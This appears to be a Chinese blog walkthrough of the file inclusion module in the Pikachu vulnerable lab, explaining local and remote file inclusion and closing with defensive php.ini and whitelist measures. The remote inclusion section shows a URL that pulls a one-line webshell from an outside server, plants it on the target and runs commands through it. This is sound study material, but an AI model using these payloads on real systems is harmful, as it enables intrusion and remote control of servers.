• Pikachu-File Inclusion模块


    一、概述

    文件包含,是一个功能。在各种开发语言中都提供了内置的文件包含函数,其可以使开发人员在一个代码文件中直接包含(引入)另外一个代码文件。 比如 在PHP中,提供了:include(),include_once() require(),require_once(),这些文件包含函数,这些函数在代码设计中被经常使用到。

    大多数情况下,文件包含函数中包含的代码文件是固定的,因此也不会出现安全问题。 但是,有些时候,文件包含的代码文件被写成了一个变量,且这个变量可以由前端用户传进来,这种情况下,如果没有做足够的安全考虑,则可能会引发文件包含漏洞。攻击者会指定一个"意想不到"的文件让包含函数去执行,从而造成恶意操作。根据不同的配置环境,文件包含漏洞分为如下两种情况:

    1. 本地文件包含漏洞:仅能够对服务器本地的文件进行包含,由于服务器上的文件并不是攻击者所能够控制的,因此该情况下,攻击者更多的会包含一些固定的系统配置文件,从而读取系统敏感信息。很多时候本地文件包含漏洞会结合一些特殊的文件上传漏洞,从而形成更大的威力。
    2. 远程文件包含漏洞:能够通过url地址对远程的文件进行包含,这意味着攻击者可以传入任意的代码。

    因此,在web应用系统的功能设计上尽量不要让前端用户直接传变量给包含函数,如果非要这么做,也一定要做严格的白名单策略进行过滤。

       

     

    二、本地文件包含演示

    在url中发现打开了本地的file1.php

    分析:根据后台发现没有进行限制,也没有设置白名单。我们可以改成服务器中的其他文件,如果是linux系统可以查看etc中的password文件。

    我们服务器是windows所以:http://192.168.0.105/pikachu/vul/fileinclude/fi_local.php?filename=../../../assets/css/ace.min.css&submit=%E6%8F%90%E4%BA%A4%E6%9F%A5%E8%AF%A2

       

       

       

       

    三、远程文件包含演示

    第一步:首先在远端我们有一个可以写入木马的恶意文件

    这里我还是使用自己的ecs服务器

     

    第二步:在有文件包含漏洞的url中调用恶意文件:

    http://192.168.0.105/pikachu/vul/fileinclude/fi_remote.php?filename=http://101.200.56.135/pikachu/test/yijuhua.txt&submit=%E6%8F%90%E4%BA%A4%E6%9F%A5%E8%AF%A2

       

    第三步:发现在他的同级目录下产生了木马文件:

       

    第四步:然后就可以用菜刀连接

    里面的木马是get型 可以直接在url中输入命令对其进行控制:

    http://192.168.0.105/pikachu/vul/fileinclude/yijuhua.php?x=ipconfig

       

     

    四、文件包含的防范措施

    1. 在功能设计上尽量不要将文件包含函数对应的文件放给前端进行选择和操作。

    2. 过滤各种../../,http://,https://

    3. 配置php.ini配置文件:

    allow_url_fopen = off

    allow_url_include=off

    magic_quotes_gpc=on

    4. 通过白名单策略,仅允许包含运行指定的文件,其他的都禁止。

  • 相关阅读:
    一本通1268 完全背包问题
    一本通1267 01背包
    合并石子1,2
    求最长不下降子序列++
    数字金字塔升级版
    一本通1354 括弧匹配检验
    一本通1353表达式括号匹配
    一本通1357车厢调度
    Centos查看端口占用情况和开启端口命令
    centos后台运行python程序
  • 原文地址:https://www.cnblogs.com/hzk001/p/12609566.html
Copyright © 2020-2023  润新知